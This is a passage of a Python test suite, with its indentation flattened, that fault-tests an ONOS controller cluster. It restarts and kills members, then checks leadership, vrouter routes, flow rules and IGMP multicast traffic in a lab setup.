self.log_set(controllers = adjacent_controllers)
self.log_set(app = 'io.atomix', controllers = adjacent_controllers)
if graceful is True:
log_test.info('Gracefully shutting down controller: %s' %controller)
self.onos_shutdown(controller)
cord_test_onos_restart(node = controller, timeout = 0)
self.log_set(controllers = controller)
self.log_set(app = 'io.atomix', controllers = controller)
time.sleep(60)
except:
time.sleep(5)
continue
#first archive the test case logs for this run
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'iteration_{}'.format(num+1),
archive_partition = self.ARCHIVE_PARTITION)
next_controller = check_exception(num, controller = controller)
def test_cluster_controller_restarts(self):
'''Test the cluster by repeatedly killing the controllers'''
self.cluster_controller_restarts()
def test_cluster_graceful_controller_restarts(self):
'''Test the cluster by repeatedly restarting the controllers gracefully'''
self.cluster_controller_restarts(graceful = True)
def test_cluster_single_controller_restarts(self):
'''Test the cluster by repeatedly restarting the same controller'''
controllers = get_controllers()
ctlr_len = len(controllers)
if ctlr_len <= 1:
log_test.info('ONOS is not running in cluster mode. This test only works for cluster mode')
assert_greater(ctlr_len, 1)
#this call would verify the cluster for once
onos_map = self.get_cluster_container_names_ips()
def check_exception(iteration, controller, inclusive = False):
adjacent_controllers = list(set(controllers) - set([controller]))
adjacent_controller = adjacent_controllers[0]
controller_list = adjacent_controllers if inclusive == False else controllers
storage_exceptions = []
for node in controller_list:
onosLog = OnosLog(host = node)
##check the logs for storage exception
_, output = onosLog.get_log(('ERROR', 'Exception',))
if output and output.find('StorageException$Timeout') >= 0:
log_test.info('\nStorage Exception Timeout found on node: %s\n' %node)
log_test.info('Dumping the ERROR and Exception logs for node: %s\n' %node)
log_test.info('\n' + '-' * 50 + '\n')
log_test.info('%s' %output)
log_test.info('\n' + '-' * 50 + '\n')
storage_exceptions.append(node)
failed = self.verify_leaders(controller_list)
if failed:
log_test.info('Leaders command failed on nodes: %s' %failed)
if storage_exceptions:
log_test.info('Storage exception seen on nodes: %s' %storage_exceptions)
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results('test_cluster_single_controller_restarts',
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
return controller
for ctlr in controller_list:
ips = self.get_cluster_current_member_ips(controller = ctlr,
nodes_filter = \
lambda nodes: [ n for n in nodes if n['state'] in [ 'ACTIVE', 'READY'] ])
log_test.info('ONOS cluster on node %s formed with controllers: %s' %(ctlr, ips))
if controller in ips and inclusive is False:
log_test.info('Controller %s still ACTIVE on Node %s after it was shutdown' %(controller, ctlr))
if controller not in ips and inclusive is True:
log_test.info('Controller %s still INACTIVE on Node %s after it was restarted' %(controller, ctlr))
return controller
tries = self.ITERATIONS
#chose a random controller for shutdown/restarts
controller = controllers[random.randrange(0, ctlr_len)]
controller_name = onos_map[controller]
##enable the log level for the controllers
self.log_set(controllers = controllers)
self.log_set(app = 'io.atomix', controllers = controllers)
for num in range(tries):
log_test.info('ITERATION: %d. Shutting down Controller %s' %(num + 1, controller_name))
try:
cord_test_onos_shutdown(node = controller)
time.sleep(20)
except:
time.sleep(5)
continue
#check for exceptions on the adjacent nodes
check_exception(num, controller)
#Now restart the controller back
log_test.info('Restarting back the controller %s' %controller_name)
cord_test_onos_restart(node = controller)
self.log_set(controllers = controller)
self.log_set(app = 'io.atomix', controllers = controller)
time.sleep(60)
#archive the logs for this run
CordLogger.archive_results('test_cluster_single_controller_restarts',
controllers = controllers,
iteration = 'iteration_{}'.format(num+1),
archive_partition = self.ARCHIVE_PARTITION)
check_exception(num, controller, inclusive = True)
def test_cluster_restarts(self):
'''Test the cluster by repeatedly restarting the entire cluster'''
controllers = get_controllers()
ctlr_len = len(controllers)
if ctlr_len <= 1:
log_test.info('ONOS is not running in cluster mode. This test only works for cluster mode')
assert_greater(ctlr_len, 1)
#this call would verify the cluster for once
onos_map = self.get_cluster_container_names_ips()
def check_exception(iteration):
controller_list = controllers
storage_exceptions = []
for node in controller_list:
onosLog = OnosLog(host = node)
##check the logs for storage exception
_, output = onosLog.get_log(('ERROR', 'Exception',))
if output and output.find('StorageException$Timeout') >= 0:
log_test.info('\nStorage Exception Timeout found on node: %s\n' %node)
log_test.info('Dumping the ERROR and Exception logs for node: %s\n' %node)
log_test.info('\n' + '-' * 50 + '\n')
log_test.info('%s' %output)
log_test.info('\n' + '-' * 50 + '\n')
storage_exceptions.append(node)
failed = self.verify_leaders(controller_list)
if failed:
log_test.info('Leaders command failed on nodes: %s' %failed)
if storage_exceptions:
log_test.info('Storage exception seen on nodes: %s' %storage_exceptions)
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results('test_cluster_restarts',
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
return
for ctlr in controller_list:
ips = self.get_cluster_current_member_ips(controller = ctlr,
nodes_filter = \
lambda nodes: [ n for n in nodes if n['state'] in [ 'ACTIVE', 'READY'] ])
log_test.info('ONOS cluster on node %s formed with controllers: %s' %(ctlr, ips))
if len(ips) != len(controllers):
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results('test_cluster_restarts',
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(ips), len(controllers))
tries = self.ITERATIONS
for num in range(tries):
log_test.info('ITERATION: %d. Restarting cluster with controllers at %s' %(num+1, controllers))
try:
cord_test_restart_cluster()
self.log_set(controllers = controllers)
self.log_set(app = 'io.atomix', controllers = controllers)
log_test.info('Delaying before verifying cluster status')
time.sleep(60)
except:
time.sleep(10)
continue
#archive the logs for this run before verification
CordLogger.archive_results('test_cluster_restarts',
controllers = controllers,
iteration = 'iteration_{}'.format(num+1),
archive_partition = self.ARCHIVE_PARTITION)
#check for exceptions on the adjacent nodes
check_exception(num)
#pass
def test_cluster_formation_and_verification(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster exists with %d ONOS instances'%onos_instances)
#nottest cluster not coming up properly if member goes down
def test_cluster_adding_members(self, add = 2, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
onos_instances = len(onos_ips)+add
log_test.info('Adding %d nodes to the ONOS cluster' %add)
cord_test_onos_add_cluster(count = add)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
def test_cluster_removing_master(self, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
log_test.info('Removing cluster current master %s'%(master))
cord_test_onos_shutdown(node = master)
time.sleep(60)
onos_instances -= 1
status = self.verify_cluster_status(onos_instances = onos_instances,controller=standbys[0])
assert_equal(status, True)
new_master, standbys = self.get_cluster_current_master_standbys(controller=standbys[0])
assert_not_equal(master,new_master)
log_test.info('Successfully removed clusters master instance')
def test_cluster_removing_one_member(self, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
log_test.info('Removing cluster member %s'%standbys[0])
cord_test_onos_shutdown(node = standbys[0])
time.sleep(60)
onos_instances -= 1
status = self.verify_cluster_status(onos_instances = onos_instances,controller=master)
assert_equal(status, True)
def test_cluster_removing_two_members(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member1_onos_name = onos_names_ips[standbys[0]]
member2_onos_name = onos_names_ips[standbys[1]]
log_test.info('Removing cluster member %s'%standbys[0])
cord_test_onos_shutdown(node = standbys[0])
log_test.info('Removing cluster member %s'%standbys[1])
cord_test_onos_shutdown(node = standbys[1])
time.sleep(60)
onos_instances = onos_instances - 2
status = self.verify_cluster_status(onos_instances = onos_instances,controller=master)
assert_equal(status, True)
def test_cluster_removing_N_members(self,remove = 2, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
for i in range(remove):
member_onos_name = onos_names_ips[standbys[i]]
log_test.info('Removing onos container with name %s'%standbys[i])
cord_test_onos_shutdown(node = standbys[i])
time.sleep(60)
onos_instances = onos_instances - remove
status = self.verify_cluster_status(onos_instances = onos_instances, controller=master)
assert_equal(status, True)
#nottest test cluster not coming up properly if member goes down
def test_cluster_adding_and_removing_members(self,onos_instances = ONOS_INSTANCES , add = 2, remove = 2):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
onos_instances = len(onos_ips)+add
log_test.info('Adding %d ONOS instances to the cluster'%add)
cord_test_onos_add_cluster(count = add)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
log_test.info('Removing %d ONOS instances from the cluster'%remove)
for i in range(remove):
name = '{}-{}'.format(Onos.NAME, onos_instances - i)
log_test.info('Removing onos container with name %s'%name)
cord_test_onos_shutdown(node = name)
time.sleep(60)
onos_instances = onos_instances-remove
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
#nottest cluster not coming up properly if member goes down
def test_cluster_removing_and_adding_member(self,onos_instances = ONOS_INSTANCES,add = 1, remove = 1):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
onos_instances = onos_instances-remove
log_test.info('Removing %d ONOS instances from the cluster'%remove)
for i in range(remove):
name = '{}-{}'.format(Onos.NAME, len(onos_ips)-i)
log_test.info('Removing onos container with name %s'%name)
cord_test_onos_shutdown(node = name)
time.sleep(60)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
log_test.info('Adding %d ONOS instances to the cluster'%add)
cord_test_onos_add_cluster(count = add)
onos_instances = onos_instances+add
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
def test_cluster_restart(self, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Restarting cluster')
cord_test_onos_restart()
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
def test_cluster_master_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
log_test.info('Restarting cluster master %s'%master)
cord_test_onos_restart(node = master)
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up after master restart as expected')
#test fail. master changing after restart. Need to check correct behavior.
def test_cluster_master_ip_after_master_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master1, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master1]
log_test.info('Restarting cluster master %s'%master1)
cord_test_onos_restart(node = master1)
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master2, standbys = self.get_cluster_current_master_standbys()
assert_equal(master1,master2)
log_test.info('Cluster master is same before and after cluster master restart as expected')
def test_cluster_one_member_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
log_test.info('Restarting cluster member %s'%standbys[0])
cord_test_onos_restart(node = standbys[0])
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up as expected after restarting one member')
def test_cluster_two_members_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member1_onos_name = onos_names_ips[standbys[0]]
member2_onos_name = onos_names_ips[standbys[1]]
log_test.info('Restarting cluster members %s and %s'%(standbys[0],standbys[1]))
cord_test_onos_restart(node = standbys[0])
cord_test_onos_restart(node = standbys[1])
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up as expected after restarting two members')
def test_cluster_state_with_N_members_restart(self, members = 2, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status,True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
for i in range(members):
member_onos_name = onos_names_ips[standbys[i]]
log_test.info('Restarting cluster member %s'%standbys[i])
cord_test_onos_restart(node = standbys[i])
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up as expected after restarting %d members'%members)
def test_cluster_state_with_master_change(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
log_test.info('Cluster current master of devices is %s'%master)
self.change_master_current_cluster(new_master=standbys[0])
log_test.info('Cluster master changed successfully')
#tested on single onos setup.
def test_cluster_with_vrouter_routes_in_cluster_members(self,networks = 5,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
self.vrouter.setUpClass()
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True)
for onos_ip in onos_ips:
tries = 0
flag = False
try:
self.cliEnter(controller = onos_ip)
while tries <= 5:
routes = json.loads(self.cli.routes(jsonFormat = True))
if routes:
assert_equal(len(routes['routes4']), networks)
self.cliExit()
flag = True
break
else:
tries += 1
time.sleep(1)
assert_equal(flag, True)
except:
log_test.info('Exception occured while checking routes in onos instance %s'%onos_ip)
raise
#tested on single onos setup.
def test_cluster_with_vrouter_and_master_down(self,networks = 5, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.vrouter.setUpClass()
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res,True)
cord_test_onos_shutdown(node = master)
time.sleep(60)
log_test.info('Verifying vrouter traffic after cluster master is down')
self.vrouter.vrouter_traffic_verify()
#tested on single onos setup.
def test_cluster_with_vrouter_and_restarting_master(self,networks = 5,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
onos_ips = self.get_cluster_current_member_ips()
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.vrouter.setUpClass()
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True)
cord_test_onos_restart()
self.vrouter.vrouter_traffic_verify()
#tested on single onos setup.
def test_cluster_deactivating_vrouter_app(self,networks = 5, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
self.vrouter.setUpClass()
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True)
self.vrouter.vrouter_activate(deactivate=True)
time.sleep(15)
self.vrouter.vrouter_traffic_verify(positive_test=False)
self.vrouter.vrouter_activate(deactivate=False)
#tested on single onos setup.
def test_cluster_deactivating_vrouter_app_and_making_master_down(self,networks = 5,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.vrouter.setUpClass()
log_test.info('Verifying vrouter before master down')
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True)
self.vrouter.vrouter_activate(deactivate=True)
log_test.info('Verifying vrouter traffic after app deactivated')
time.sleep(15) ## Expecting vrouter should work properly if master of cluster goes down
self.vrouter.vrouter_traffic_verify(positive_test=False)
log_test.info('Verifying vrouter traffic after master down')
cord_test_onos_shutdown(node = master)
time.sleep(60)
self.vrouter.vrouter_traffic_verify(positive_test=False)
self.vrouter.vrouter_activate(deactivate=False)
#tested on single onos setup.
def test_cluster_for_vrouter_app_and_making_member_down(self, networks = 5,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
self.vrouter.setUpClass()
log_test.info('Verifying vrouter before cluster member down')
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True) # Expecting vrouter should work properly
log_test.info('Verifying vrouter after cluster member down')
cord_test_onos_shutdown(node = standbys[0])
time.sleep(60)
self.vrouter.vrouter_traffic_verify()# Expecting vrouter should work properly if member of cluster goes down
#tested on single onos setup.
def test_cluster_for_vrouter_app_and_restarting_member(self,networks = 5, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[1]]
self.vrouter.setUpClass()
log_test.info('Verifying vrouter traffic before cluster member restart')
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True) # Expecting vrouter should work properly
cord_test_onos_restart(node = standbys[1])
log_test.info('Verifying vrouter traffic after cluster member restart')
self.vrouter.vrouter_traffic_verify()# Expecting vrouter should work properly if member of cluster restarts
#tested on single onos setup.
def test_cluster_for_vrouter_app_restarting_cluster(self,networks = 5, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
self.vrouter.setUpClass()
log_test.info('Verifying vrouter traffic before cluster restart')
res = self.vrouter.vrouter_network_verify(networks, peers = 1)
assert_equal(res, True) # Expecting vrouter should work properly
cord_test_onos_restart()
log_test.info('Verifying vrouter traffic after cluster restart')
self.vrouter.vrouter_traffic_verify()# Expecting vrouter should work properly if member of cluster restarts
#test fails because flow state is in pending_add in onos
def test_cluster_for_flows_of_udp_port_and_making_master_down(self, onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances = onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.flows.setUpClass()
egress = 1
ingress = 2
egress_map = { 'ip': '192.168.30.1', 'udp_port': 9500 }
ingress_map = { 'ip': '192.168.40.1', 'udp_port': 9000 }
flow = OnosFlowCtrl(deviceId = self.device_id,
egressPort = egress,
ingressPort = ingress,
udpSrc = ingress_map['udp_port'],
udpDst = egress_map['udp_port'],
controller=master
)
result = flow.addFlow()
assert_equal(result, True)
time.sleep(1)
self.success = False
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Pkt seen with ingress UDP port %s, egress UDP port %s' %(pkt[UDP].sport, pkt[UDP].dport))
self.success = True
sniff(timeout=2,
lfilter = lambda p: UDP in p and p[UDP].dport == egress_map['udp_port']
and p[UDP].sport == ingress_map['udp_port'], prn = recv_cb, iface = self.flows.port_map[egress])
for i in [0,1]:
if i == 1:
cord_test_onos_shutdown(node = master)
log_test.info('Verifying flows traffic after master killed')
time.sleep(45)
else:
log_test.info('Verifying flows traffic before master killed')
t = threading.Thread(target = mac_recv_task)
t.start()
L2 = self.flows_eth #Ether(src = ingress_map['ether'], dst = egress_map['ether'])
L3 = IP(src = ingress_map['ip'], dst = egress_map['ip'])
L4 = UDP(sport = ingress_map['udp_port'], dport = egress_map['udp_port'])
pkt = L2/L3/L4
log_test.info('Sending packets to verify if flows are correct')
sendp(pkt, count=50, iface = self.flows.port_map[ingress])
t.join()
assert_equal(self.success, True)
def test_cluster_state_changing_master_and_flows_of_ecn(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
self.flows.setUpClass()
egress = 1
ingress = 2
egress_map = { 'ip': '192.168.30.1' }
ingress_map = { 'ip': '192.168.40.1' }
flow = OnosFlowCtrl(deviceId = self.device_id,
egressPort = egress,
ingressPort = ingress,
ecn = 1,
controller=master
)
result = flow.addFlow()
assert_equal(result, True)
##wait for flows to be added to ONOS
time.sleep(1)
self.success = False
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Pkt seen with ingress ip %s, egress ip %s and Type of Service %s' %(pkt[IP].src, pkt[IP].dst, pkt[IP].tos))
self.success = True
sniff(count=2, timeout=5,
lfilter = lambda p: IP in p and p[IP].dst == egress_map['ip'] and p[IP].src == ingress_map['ip']
and int(bin(p[IP].tos).split('b')[1][-2:],2) == 1,prn = recv_cb,
iface = self.flows.port_map[egress])
for i in [0,1]:
if i == 1:
log_test.info('Changing cluster master to %s'%standbys[0])
self.change_master_current_cluster(new_master=standbys[0])
log_test.info('Verifying flow traffic after cluster master chnaged')
else:
log_test.info('Verifying flow traffic before cluster master changed')
t = threading.Thread(target = mac_recv_task)
t.start()
L2 = self.flows_eth # Ether(src = ingress_map['ether'], dst = egress_map['ether'])
L3 = IP(src = ingress_map['ip'], dst = egress_map['ip'], tos = 1)
pkt = L2/L3
log_test.info('Sending a packet to verify if flows are correct')
sendp(pkt, count=50, iface = self.flows.port_map[ingress])
t.join()
assert_equal(self.success, True)
#pass
def test_cluster_flow_for_ipv6_extension_header_and_master_restart(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.flows.setUpClass()
egress = 1
ingress = 2
egress_map = { 'ipv6': '2001:db8:a0b:12f0:1010:1010:1010:1001' }
ingress_map = { 'ipv6': '2001:db8:a0b:12f0:1010:1010:1010:1002' }
flow = OnosFlowCtrl(deviceId = self.device_id,
egressPort = egress,
ingressPort = ingress,
ipv6_extension = 0,
controller=master
)
result = flow.addFlow()
assert_equal(result, True)
##wait for flows to be added to ONOS
time.sleep(1)
self.success = False
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Pkt seen with ingress ip %s, egress ip %s, Extension Header Type %s'%(pkt[IPv6].src, pkt[IPv6].dst, pkt[IPv6].nh))
self.success = True
sniff(timeout=2,count=5,
lfilter = lambda p: IPv6 in p and p[IPv6].nh == 0, prn = recv_cb, iface = self.flows.port_map[egress])
for i in [0,1]:
if i == 1:
log_test.info('Restart cluster current master %s'%master)
Container(master_onos_name,Onos.IMAGE).restart()
time.sleep(45)
log_test.info('Verifying flow traffic after master restart')
else:
log_test.info('Verifying flow traffic before master restart')
t = threading.Thread(target = mac_recv_task)
t.start()
L2 = self.flows_eth
L3 = IPv6(src = ingress_map['ipv6'] , dst = egress_map['ipv6'], nh = 0)
pkt = L2/L3
log_test.info('Sending packets to verify if flows are correct')
sendp(pkt, count=50, iface = self.flows.port_map[ingress])
t.join()
assert_equal(self.success, True)
def send_multicast_data_traffic(self, group, intf= 'veth2',source = '1.2.3.4'):
dst_mac = self.igmp.iptomac(group)
eth = Ether(dst= dst_mac)
ip = IP(dst=group,src=source)
data = repr(monotonic.monotonic())
sendp(eth/ip/data,count=20, iface = intf)
pkt = (eth/ip/data)
log_test.info('multicast traffic packet %s'%pkt.show())
def verify_igmp_data_traffic(self, group, intf='veth0', source='1.2.3.4' ):
log_test.info('verifying multicast traffic for group %s from source %s'%(group,source))
self.success = False
def recv_task():
def igmp_recv_cb(pkt):
log_test.info('multicast data received for group %s from source %s'%(group,source))
self.success = True
sniff(prn = igmp_recv_cb,lfilter = lambda p: IP in p and p[IP].dst == group and p[IP].src == source, count=1,timeout = 2, iface='veth0')
t = threading.Thread(target = recv_task)
t.start()
self.send_multicast_data_traffic(group,source=source)
t.join()
return self.success
#pass
def test_cluster_with_igmp_include_exclude_modes_and_restarting_master(self, onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.igmp.setUp(controller=master)
groups = ['224.2.3.4','230.5.6.7']
src_list = ['2.2.2.2','3.3.3.3']
self.igmp.onos_ssm_table_load(groups, src_list=src_list, controller=master)
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
self.igmp.send_igmp_join(groups = [groups[1]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_EXCLUDE,
iface = self.V_INF1, delay = 2)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
status = self.verify_igmp_data_traffic(groups[1],intf = self.V_INF1,source= src_list[1])
assert_equal(status,False)
log_test.info('restarting cluster master %s'%master)
Container(master_onos_name,Onos.IMAGE).restart()
time.sleep(60)
log_test.info('verifying multicast data traffic after master restart')
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
status = self.verify_igmp_data_traffic(groups[1],intf = self.V_INF1,source= src_list[1])
assert_equal(status,False)
#pass
def test_cluster_with_igmp_include_exclude_modes_and_making_master_down(self, onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.igmp.setUp(controller=master)
groups = [self.igmp.random_mcast_ip(),self.igmp.random_mcast_ip()]
src_list = [self.igmp.randomsourceip()]
self.igmp.onos_ssm_table_load(groups, src_list=src_list,controller=master)
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
self.igmp.send_igmp_join(groups = [groups[1]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_EXCLUDE,
iface = self.V_INF1, delay = 2)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
status = self.verify_igmp_data_traffic(groups[1],intf = self.V_INF1,source= src_list[0])
assert_equal(status,False)
log_test.info('Killing cluster master %s'%master)
Container(master_onos_name,Onos.IMAGE).kill()
time.sleep(60)
status = self.verify_cluster_status(onos_instances=onos_instances-1,controller=standbys[0])
assert_equal(status, True)
log_test.info('Verifying multicast data traffic after cluster master down')
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
status = self.verify_igmp_data_traffic(groups[1],intf = self.V_INF1,source= src_list[0])
assert_equal(status,False)
def test_cluster_with_igmp_include_mode_checking_traffic_recovery_time_after_master_is_down(self, onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.igmp.setUp(controller=master)
groups = [self.igmp.random_mcast_ip()]
src_list = [self.igmp.randomsourceip()]
self.igmp.onos_ssm_table_load(groups, src_list=src_list,controller=master)
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
log_test.info('Killing clusters master %s'%master)
Container(master_onos_name,Onos.IMAGE).kill()
count = 0
for i in range(60):
log_test.info('Verifying multicast data traffic after cluster master down')
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
if status:
break
else:
count += 1
time.sleep(1)
assert_equal(status, True)
log_test.info('Time taken to recover traffic after clusters master down is %d seconds'%count)
#pass
def test_cluster_state_with_igmp_leave_group_after_master_change(self, onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
self.igmp.setUp(controller=master)
groups = [self.igmp.random_mcast_ip()]
src_list = [self.igmp.randomsourceip()]
self.igmp.onos_ssm_table_load(groups, src_list=src_list,controller=master)
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
